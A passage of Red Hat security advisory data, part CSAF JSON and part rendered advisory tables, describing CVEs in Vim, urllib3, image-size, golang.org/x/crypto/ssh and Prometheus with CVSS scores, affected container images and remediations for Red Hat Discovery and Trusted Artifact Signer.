"url": "https://github.com/vim/vim/commit/c78194e41d5a0b05b0ddf383b6679b1503f977fb"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/releases/tag/v9.2.0357",
"url": "https://github.com/vim/vim/releases/tag/v9.2.0357"
},
{
"category": "external",
"summary": "https://github.com/vim/vim/security/advisories/GHSA-cwgx-gcj7-6qh8",
"url": "https://github.com/vim/vim/security/advisories/GHSA-cwgx-gcj7-6qh8"
}
],
"release_date": "2026-04-24T16:51:39.657000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-29T22:05:31+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33313"
},
{
"category": "workaround",
"details": "Mitigation for this issue involves exercising caution when opening or processing tag files from untrusted sources. Users should avoid loading tag files from unknown or suspicious origins to prevent the execution of arbitrary commands.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "vim: Vim: Command injection allows arbitrary code execution via malicious tag files"
},
{
"cve": "CVE-2026-44431",
"cwe": {
"id": "CWE-201",
"name": "Insertion of Sensitive Information Into Sent Data"
},
"discovery_date": "2026-05-13T17:01:41.663622+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477167"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in urllib3, an HTTP client library for Python. When using the low-level API via `ProxyManager.connection_from_url().urlopen()` with `assert_same_host=False`, cross-origin redirects can still forward sensitive headers. This could allow a remote attacker to gain unauthorized access to sensitive information.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "urllib3: urllib3: Information disclosure via cross-origin redirects forwarding sensitive headers",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
],
"known_not_affected": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44431"
},
{
"category": "external",
"summary": "RHBZ#2477167",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477167"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44431",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44431"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44431",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44431"
},
{
"category": "external",
"summary": "https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc",
"url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc"
}
],
"release_date": "2026-05-13T15:20:24.588000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-29T22:05:31+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33313"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "urllib3: urllib3: Information disclosure via cross-origin redirects forwarding sensitive headers"
},
{
"cve": "CVE-2026-44432",
"cwe": {
"id": "CWE-409",
"name": "Improper Handling of Highly Compressed Data (Data Amplification)"
},
"discovery_date": "2026-05-13T17:01:01.083841+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in urllib3, an HTTP client library for Python. This vulnerability allows a remote attacker to cause excessive resource consumption, such as high CPU usage and massive memory allocation, on the client side. This occurs when urllib3 attempts to decompress an entire HTTP response, even if only a partial read was requested, or when draining the connection after a partial decompression. This can lead to a Denial of Service (DoS) condition.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "urllib3: urllib3: Denial of Service due to excessive HTTP response decompression",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
],
"known_not_affected": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44432"
},
{
"category": "external",
"summary": "RHBZ#2477154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44432",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44432"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44432",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44432"
},
{
"category": "external",
"summary": "https://github.com/urllib3/urllib3/security/advisories/GHSA-mf9v-mfxr-j63j",
"url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-mf9v-mfxr-j63j"
}
],
"release_date": "2026-05-13T15:17:12.611000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-29T22:05:31+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33313"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:6c26d60b5d8eb5a823be4d6e83f2ebb32f5d15216338b85eb4b08aca4dc9316d_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:7f4f6ce62705fe518e3513957b4205f106992cd42d1b07975d11aff2dc6ced66_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:3152cbb7f8ab85315ebb95b9f5cd5793c40859ee4487587f16a525ac5d408a44_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:e9614239f2c391d00779cf6c7b998400de90bafbda14aa034e09020723c25a70_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "urllib3: urllib3: Denial of Service due to excessive HTTP response decompression"
}
]
}
RHSA-2026:37272
Vulnerability from csaf_redhat - Published: 2026-07-09 11:43 - Updated: 2026-07-10 19:40A flaw was found in image-size. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by supplying specially crafted JXL, HEIF, or JP2 image files that contain zero-sized boxes. The `findBox` function, responsible for image validation, enters an infinite loop when processing these malicious files, leading to an application hang. This can disrupt the availability of services relying on the image-size component.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64 | — |
Workaround
|
A flaw was found in golang.org/x/crypto/ssh. A remote attacker could exploit this vulnerability when an SSH server authentication callback returned a PartialSuccessError with non-nil permissions. This flaw caused these permissions to be silently discarded, potentially bypassing certificate restrictions, such as a force-command, after a second authentication factor succeeded. This could lead to unauthorized command execution or access.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64 | — |
Workaround
|
A flaw was found in golang.org/x/crypto/ssh. The RSA and DSA public key parsers in the affected component did not enforce size limits on key parameters. This vulnerability allows an unauthenticated client to provide a crafted public key with an excessively large modulus or DSA parameter during public key authentication. Successful exploitation could lead to a denial of service (DoS) due to prolonged CPU consumption during signature verification.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64 | — |
Workaround
|
A flaw was found in golang.org/x/crypto/ssh. A remote malicious SSH peer can exploit this by sending unsolicited global request responses, which fills an internal buffer and blocks the connection's read loop. This prevents the associated resources from being released, leading to a resource leak per connection. The consequence is a Denial of Service (DoS) for the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64 | — |
Workaround
|
A flaw was found in golang.org/x/crypto/ssh. SSH servers configured to use CertChecker as a public key callback, without explicitly setting IsUserAuthority or IsHostAuthority, are vulnerable. A remote attacker can exploit this by presenting a specially crafted certificate, causing the server to panic and resulting in a Denial of Service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64 | — |
Workaround
|
A flaw was found in Prometheus, an open-source monitoring system. The `client_secret` field within the Azure Active Directory (AD) remote write OAuth configuration was incorrectly handled as a plain string instead of a secure Secret type. This misconfiguration allowed any user or process with access to the `/-/config` HTTP API endpoint to view the Azure OAuth client secret in plaintext. This vulnerability leads to information disclosure, potentially compromising the security of integrated Azure AD services.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64 | — | ||
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64 | — | ||
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64 | — | ||
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64 | — | ||
